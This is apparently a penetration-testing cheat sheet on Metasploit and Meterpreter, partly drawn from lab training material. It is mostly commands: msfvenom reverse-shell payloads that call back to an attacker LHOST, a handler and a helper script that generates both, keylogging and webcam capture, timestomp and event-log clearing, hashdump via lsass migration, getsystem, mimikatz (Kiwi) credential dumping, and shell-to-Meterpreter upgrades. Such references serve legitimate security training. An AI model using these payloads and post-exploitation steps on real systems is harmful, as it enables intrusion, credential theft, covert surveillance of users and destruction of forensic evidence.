# Metasploit and Meterpreter

## Basic commands

```
show payloads                    // list all payloads
info                             // full details of the selected module: description, options, targets, references
search type:auxiliary telnet     // limit a search to a particular module type
unset <OPTION>                   // revert an option to its default
setg <OPTION> <VALUE>            // set an option globally, for all current and future modules
exploit -z                       // run the exploit but do not interact with the new session (background it)
getpid                           // process ID the Meterpreter session is running in
```

## Finding files in meterpreter

```
search -f flag*.txt              // Meterpreter: search the target file system (add -d <dir> to start from a given directory)
```

From a system shell on a Linux target instead:

```
find / -name "flag" 2>/dev/null
```

## Payloads

### List Payloads

```
msfvenom -l payloads             // list all payloads
msfvenom --list formats          // list output formats
```

```
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
```

Based on the target system's configuration (operating system, installed web server, installed interpreters, etc.), msfvenom can produce payloads in almost any format. Below are a few examples you will use often:

In all these examples, LHOST is the IP address of your attacking machine and LPORT the port your handler listens on.\
The .elf format is the Linux counterpart of a Windows .exe: a native executable. You may still need to give it execute permission on the target, e.g. `chmod +x shell.elf` once the file is on the box, after which you run it with `./shell.elf` from the target's command line.

```
// Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

// Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

// PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

// ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

// Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
```

The handler's PAYLOAD must be set to exactly the same payload name; note that `php/meterpreter_reverse_tcp` (underscore) is the stageless variant, not `php/meterpreter/reverse_tcp`.

If msfconsole reports database errors (`db_status` shows no connection and searches fall back to the slow path), start the PostgreSQL service, then restart msfconsole and check with `db_status`:

```
service postgresql start
```

## Multi handler

PAYLOAD, LHOST and LPORT must match what msfvenom was given, otherwise the stager connects back but the handler cannot stage it.

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit -j -z                    // run as a background job and do not interact with the session
```
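As an added example (not from the original page), the following shell script generates the msfvenom command and a matching `exploit/multi/handler` resource script from one set of values, so the handler always stages the payload it was built for. The output file names, the `format_for` mapping from payload prefix to output format, and the `10.10.X.X` placeholder are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: keep msfvenom and multi/handler in sync.
set -eu

# Reject anything that is not a TCP port in 1..65535.
valid_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the msfvenom command line. -o writes the file directly instead of relying on
# shell redirection, so a mistyped file name cannot silently produce the wrong artifact.
msfvenom_cmd() {
  payload=$1 lhost=$2 lport=$3 fmt=$4 out=$5
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$payload" "$lhost" "$lport" "$fmt" "$out"
}

# Print a resource script for 'msfconsole -q -r handler.rc'. ExitOnSession false keeps the
# listener up after the first callback; 'exploit -j -z' runs it as a background job.
handler_rc() {
  payload=$1 lhost=$2 lport=$3
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  printf 'use exploit/multi/handler\n'
  printf 'set PAYLOAD %s\n' "$payload"
  printf 'set LHOST %s\n' "$lhost"
  printf 'set LPORT %s\n' "$lport"
  printf 'set ExitOnSession false\n'
  printf 'exploit -j -z\n'
}

# Map a payload prefix to the output format used on this page for that platform
# (elf/exe/raw). Assumption: staged and stageless variants share the same format.
format_for() {
  case "$1" in
    windows/*)  echo exe ;;
    linux/*)    echo elf ;;
    php/*)      echo raw ;;
    cmd/unix/*) echo raw ;;
    *)          return 1 ;;
  esac
}

# Example run with placeholder attacker values.
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=10.10.X.X
LPORT=4444
msfvenom_cmd "$PAYLOAD" "$LHOST" "$LPORT" "$(format_for "$PAYLOAD")" rev_shell.exe
handler_rc "$PAYLOAD" "$LHOST" "$LPORT"      # redirect to handler.rc, then: msfconsole -q -r handler.rc
```

Because both command lines are built from the same three variables, a payload/handler mismatch (the most common reason a callback arrives but no session opens) cannot happen by typo; the port check catches the other frequent slip, an LPORT outside the valid range.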

Useful Meterpreter commands

```
sysinfo                          // OS, architecture, hostname
getuid                           // user the session is running as
ifconfig                         // network interfaces on the target
pwd                              // working directory of the process the payload was started from
ls
cat <file>
cd <dir>
keyscan_start                    // start the keylogger (captures input for the desktop/session Meterpreter lives in)
keyscan_dump                     // dump the captured keystrokes
idletime                         // seconds since the user last interacted with the machine
```

To modify a file's MACE (Modified, Accessed, Created, Entry-modified) timestamps, with dates given as `MM/DD/YYYY HH24:MI:SS`:

```
timestomp secret.ext -m "2/11/2022 8:10:03"
```

To view the timestamp entries

```
timestomp secret.ext -v
```

{% hint style="info" %}
-m modified

-a accessed

-c created

-e entry modified

-z sets all four at once, -f <file> copies the MACE values from another file, -b blanks them
{% endhint %}

Note that timestomp changes the NTFS `$STANDARD_INFORMATION` timestamps only; the `$FILE_NAME` attribute keeps its own copies, and forensic tools compare the two to spot tampering.

## Hidden files in shell

Drop into a system shell first (`shell` from Meterpreter), then list hidden files:

```
dir /a:h
```

## List all services in shell

```
sc queryex type= service state= all      // the space after each '=' is required by sc
```

## Other shell commands

```
netsh firewall show state                        // firewall state (legacy context; on Vista and later use 'netsh advfirewall show allprofiles')
netsh firewall show config
wmic cpu get                                     // all CPU properties
wmic /node:"" product get name,version,vendor    // installed products; /node: takes a remote host name
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot              // restarts the system
```

## Dumping hashes in meterpreter

`hashdump` needs SYSTEM privileges. If it fails, the post module below picks a dumping technique based on the privilege level and on whether the host is a domain controller (run it from msfconsole with the session backgrounded, or `run post/windows/gather/smart_hashdump` inside Meterpreter).

```
hashdump                                 // or try the following
use post/windows/gather/smart_hashdump
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FDMjvqoZHONN3Ut9wba06%2Fimage.png?alt=media&#x26;token=e8a56a54-e0e1-478d-9888-d8a63332b1a8" alt=""><figcaption></figcaption></figure>

## Metasploit Scanners

```
auxiliary/scanner/discovery/udp_sweep
auxiliary/scanner/http/http_version
```

## Meterpreter commands

Core commands will help you navigate and interact with the target system. Below are some of the most commonly used; run `help` once a Meterpreter session has started to see everything available.\
Core commands

* `background`: Backgrounds the current session
* `exit`: Terminate the Meterpreter session
* `guid`: Get the session GUID (Globally Unique Identifier)
* `help`: Displays the help menu
* `info`: Displays information about a Post module
* `irb`: Opens an interactive Ruby shell on the current session
* `load`: Loads one or more Meterpreter extensions
* `migrate`: Allows you to migrate Meterpreter to another process
* `run`: Executes a Meterpreter script or Post module
* `sessions`: Quickly switch to another session

### File system commands

* `cd`: Will change directory
* `ls`: Will list files in the current directory (dir will also work)
* `pwd`: Prints the current working directory
* `edit`: will allow you to edit a file
* `cat`: Will show the contents of a file to the screen
* `rm`: Will delete the specified file
* `search`: Will search for files
* `upload`: Will upload a file or directory
* `download`: Will download a file or directory

### Networking commands

* `arp`: Displays the host ARP (Address Resolution Protocol) cache
* `ifconfig`: Displays network interfaces available on the target system
* `netstat`: Displays the network connections
* `portfwd`: Forwards a local port to a remote service
* `route`: Allows you to view and modify the routing table

### System commands

* `clearev`: Clears the event logs
* `execute`: Executes a command
* `getpid`: Shows the current process identifier
* `getuid`: Shows the user that Meterpreter is running as
* `kill`: Terminates a process
* `pkill`: Terminates processes by name
* `ps`: Lists running processes
* `reboot`: Reboots the remote computer
* `shell`: Drops into a system command shell
* `shutdown`: Shuts down the remote computer
* `sysinfo`: Gets information about the remote system, such as OS

### Other commands (these are listed under different categories in the help menu)

* `idletime`: Returns the number of seconds the remote user has been idle
* `keyscan_dump`: Dumps the keystroke buffer
* `keyscan_start`: Starts capturing keystrokes
* `keyscan_stop`: Stops capturing keystrokes
* `screenshare`: Allows you to watch the remote user's desktop in real time
* `screenshot`: Grabs a screenshot of the interactive desktop
* `record_mic`: Records audio from the default microphone for X seconds
* `webcam_chat`: Starts a video chat
* `webcam_list`: Lists webcams
* `webcam_snap`: Takes a snapshot from the specified webcam
* `webcam_stream`: Plays a video stream from the specified webcam
* <mark style="color:red;">`getsystem`</mark><mark style="color:red;">: Attempts to elevate your privilege to that of local system</mark>
* <mark style="color:red;">`hashdump`</mark><mark style="color:red;">: Dumps the contents of the SAM database</mark>

Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.

#### Migrating to system process

Search for the PID of explorer.exe and use the migrate command to migrate the current process to the explorer process.

```
ps -S explorer.exe
migrate 2332
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FpY9YbMcQrlbUoR3JnjOb%2Fimage.png?alt=media&#x26;token=4acc3530-aa90-4d7e-973a-04fd1ca0748d" alt=""><figcaption></figcaption></figure>

#### Elevate to SYSTEM

```
getsystem
```

Type `getprivs` to view the privileges the current token holds.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*2JwoGUwLMKfuq3gA2qzg7A.png" alt="" height="174" width="700"><figcaption></figcaption></figure>

These privileges belong to the current user. If `SeImpersonatePrivilege` is present, `getsystem` is likely to succeed through its default technique, Named Pipe Impersonation: it creates a named pipe, makes a SYSTEM service connect to it, and impersonates that client's token.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*_UU6recOjAuUFeSQOduv5Q.png" alt="" height="53" width="700"><figcaption></figcaption></figure>

We have elevated our privileges.

#### Uploading Files

```
upload /root/static-binaries/nmap /tmp/nmap
upload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F9nY3sjN0ntRLFpMBybIc%2Fimage.png?alt=media&#x26;token=5a91677f-86ce-4eab-a952-f2529b4fbf07" alt=""><figcaption></figcaption></figure>

#### Changing directory

Backslashes have to be escaped (doubled) at the Meterpreter prompt:

```
cd C:\\Users\\admin\\AppData\\Local\\Temp
```

## Meterpreter Modules

You can also use the `load` command to bring in additional extensions such as Kiwi (mimikatz) or even a whole Python interpreter.

Loading Python (the embedded interpreter uses Python 2 syntax, hence the `print` statement below)

```shell-session
meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!

meterpreter >
```

The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.

* Gathering further information about the target system.
* Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
* Privilege escalation.
* Lateral movement.

Once any additional tool is loaded using the `load` command, you will see new options on the `help` menu. The example below shows commands added for the Kiwi module (using the `load kiwi` command).

### Loading Kiwi (mimikatz)

```shell-session
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
```

The available commands change with the loaded extension, so running `help` after loading one is always a good idea. The updated help menu:

```shell-session
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)
```

### Dumping hashes

```
hashdump
```

If it does not work, get SYSTEM first (`getsystem`) or migrate into a process already running as SYSTEM, such as **lsass.exe**, and then run the command again. Keep in mind that lsass.exe is heavily monitored by EDR and that crashing it reboots the machine, so prefer `getsystem` or a less sensitive SYSTEM process when you can.

```
ps                               // find the PID of lsass.exe (or another SYSTEM process)
migrate 764
hashdump
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FvpDqNJLquPSHv3JSJUVv%2Fimage.png?alt=media&#x26;token=56bd6e23-f050-445b-804f-0946d68d64fc" alt=""><figcaption></figcaption></figure>

### Revert to original user

If you have impersonated another token (after `getsystem`, or a token taken with `steal_token`), drop back to the session's original token with

```
rev2self
```

### Post Exploitation Shell to Meterpreter

Upgrade a plain command-shell session to Meterpreter; LHOST is the attacker IP the new stager calls back to.

```
use post/multi/manage/shell_to_meterpreter
set SESSION 1                    // the shell session to upgrade
set LHOST 192.212.191.2
run
```

The shortcut `sessions -u 1` runs the same module against session 1.
